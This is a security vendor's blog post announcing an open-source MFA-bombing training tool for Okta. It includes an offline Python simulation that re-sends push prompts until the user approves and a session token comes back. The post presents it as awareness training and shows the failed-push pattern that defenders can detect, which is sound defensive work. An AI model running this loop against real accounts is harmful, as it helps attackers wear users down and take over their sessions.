Authomize Open Sources MFA Bombing Training Tool

31/05/2023 • Gabriel Avner

Security is a cat-and-mouse arms race. Multi-factor authentication was supposed to stop attackers in their tracks, but, as always happens, attackers have found creative ways around the extra layer of protection.

Attacks on Uber, Microsoft, and Cisco, to name just a few, all used a tactic called MFA bombing (also known as MFA fatigue or push spamming): the attacker, already holding valid credentials, wears the target down with wave after wave of MFA prompts until the victim approves one, letting the attacker complete the breach.

You can learn more about MFA bombing in our video below.

While Microsoft is adding new features to help fight against MFA fatigue, security teams still need to engage with their workforce to build resilience against these attacks.

Thankfully, Authomize’s research team is here to help with a new open source training tool.

Check out our tool here: 

Who is it Good for?

Focusing on defending access to Okta, this tool provides value for both the Blue and Red teams.

  1. Blue Team

    For the defense crew, use the tool to send push prompts to all relevant users, raising awareness of the issue and testing whether they deny prompts they did not initiate.

    Some blue teams may decide to go purple and use it to try to elevate their own privileges as part of the testing.

  2. Red Team

    If you have a user's credentials, the tool automates the continuous bombardment of that user with MFA push requests until they relent and approve one, at which point you receive a session token to log in with.
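The loop the Red Team item describes, written out as an added example; this is not code from the Authomize repository. Both sides are modelled in memory so it runs offline: FakeOktaAuthn mimics the response shapes of Okta's Authentication API as publicly documented (stateToken, status MFA_REQUIRED / MFA_CHALLENGE / SUCCESS, factorResult WAITING / REJECTED / TIMEOUT, sessionToken on approval), while the target user's reactions are a constructed script. FakeOktaAuthn, mfa_bomb, BombResult, the factor ids and the token values are names invented for this example, not the tool's.

```python
"""Simulation of an MFA push-bombing loop against an Okta-shaped
Authentication API. Both sides are modelled in memory; no network.
Added example, not code from the Authomize tool."""
from dataclasses import dataclass, field
from typing import List, Optional


class FakeOktaAuthn:
    """In-memory stand-in for Okta's classic Authentication API.

    Response shapes follow the public /api/v1/authn flow; the user's scripted
    reactions (one per push sent) are constructed for this example.
    """

    def __init__(self, password: str, reactions: List[str]):
        self._password = password
        self._reactions = list(reactions)  # each is "deny", "ignore" or "approve"
        self._pending = None               # reaction to the push currently on screen
        self.pushes_sent = 0               # what the identity provider's log would record

    def authn(self, username: str, password: str) -> dict:
        """POST /api/v1/authn: primary auth succeeds, a second factor is demanded."""
        if password != self._password:
            return {"errorCode": "E0000004", "errorSummary": "Authentication failed"}
        return {
            "status": "MFA_REQUIRED",
            "stateToken": f"st-{username}",
            "_embedded": {"factors": [
                {"id": "opf-push-1", "factorType": "push", "provider": "OKTA"},
                {"id": "sms-1", "factorType": "sms", "provider": "OKTA"},
            ]},
        }

    def verify(self, factor_id: str, state_token: str) -> dict:
        """POST /api/v1/authn/factors/{id}/verify: the first call sends a push and
        returns WAITING; the next call (a poll) reports what the user did."""
        if factor_id != "opf-push-1" or not state_token.startswith("st-"):
            return {"errorCode": "E0000011", "errorSummary": "Invalid token provided"}
        if self._pending is None:
            # No push outstanding: send one and hold its future result.
            self.pushes_sent += 1
            self._pending = self._reactions.pop(0) if self._reactions else "ignore"
            return {"status": "MFA_CHALLENGE", "factorResult": "WAITING"}
        reaction, self._pending = self._pending, None
        if reaction == "approve":
            # Constructed token value; a real sessionToken is an opaque string.
            return {"status": "SUCCESS", "sessionToken": "20111" + state_token}
        result = "REJECTED" if reaction == "deny" else "TIMEOUT"
        return {"status": "MFA_CHALLENGE", "factorResult": result}


@dataclass
class BombResult:
    session_token: Optional[str]
    pushes_sent: int
    outcomes: List[str] = field(default_factory=list)


def mfa_bomb(client, username: str, password: str, max_pushes: int = 5) -> BombResult:
    """Re-send the push factor until the user approves or the cap is reached."""
    r = client.authn(username, password)
    if r.get("status") != "MFA_REQUIRED":
        return BombResult(None, 0, [r.get("errorSummary", r.get("status", "?"))])
    state = r["stateToken"]
    push = next((f for f in r["_embedded"]["factors"] if f["factorType"] == "push"), None)
    if push is None:
        return BombResult(None, 0, ["no push factor enrolled"])
    outcomes: List[str] = []
    pushes = 0
    for _ in range(max_pushes):
        res = client.verify(push["id"], state)        # fires one push
        pushes += 1
        while res.get("factorResult") == "WAITING":   # poll until the user acts
            res = client.verify(push["id"], state)
        if res.get("status") == "SUCCESS":
            outcomes.append("SUCCESS")
            return BombResult(res["sessionToken"], pushes, outcomes)
        outcomes.append(res.get("factorResult", "ERROR"))  # REJECTED/TIMEOUT: go again
    return BombResult(None, pushes, outcomes)


if __name__ == "__main__":
    # Constructed scenario: the user denies twice, ignores once, then gives in.
    okta = FakeOktaAuthn("hunter2", ["deny", "deny", "ignore", "approve"])
    print(mfa_bomb(okta, "alice", "hunter2"))
```

Two things worth noticing in the run: the attacker never needs more than the password and a bounded loop, and every iteration leaves a REJECTED or TIMEOUT challenge behind before the final SUCCESS. A training run should keep `max_pushes` small, and that burst of failed push challenges on one account is exactly the pattern the defending team should be watching for.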

A Gentle Reminder to Play Nice

Our hope is that everyone will find this tool useful and we can play a part in making your team a little bit more aware and a lot safer. 

Our one request is to use this tool conscientiously: treat it as an opportunity to educate, not as a big stick for those who fall for the test.

Just like sending phishing emails can be useful for training, the goal should not be to alienate your workforce. 

At the end of the day, it is essential to strike the right balance: put people through their paces, but keep the kind of working relationship in which they will still reach out to you when something looks wrong.

Have fun and let us know what you think of our tool by responding in the repo or to this post.

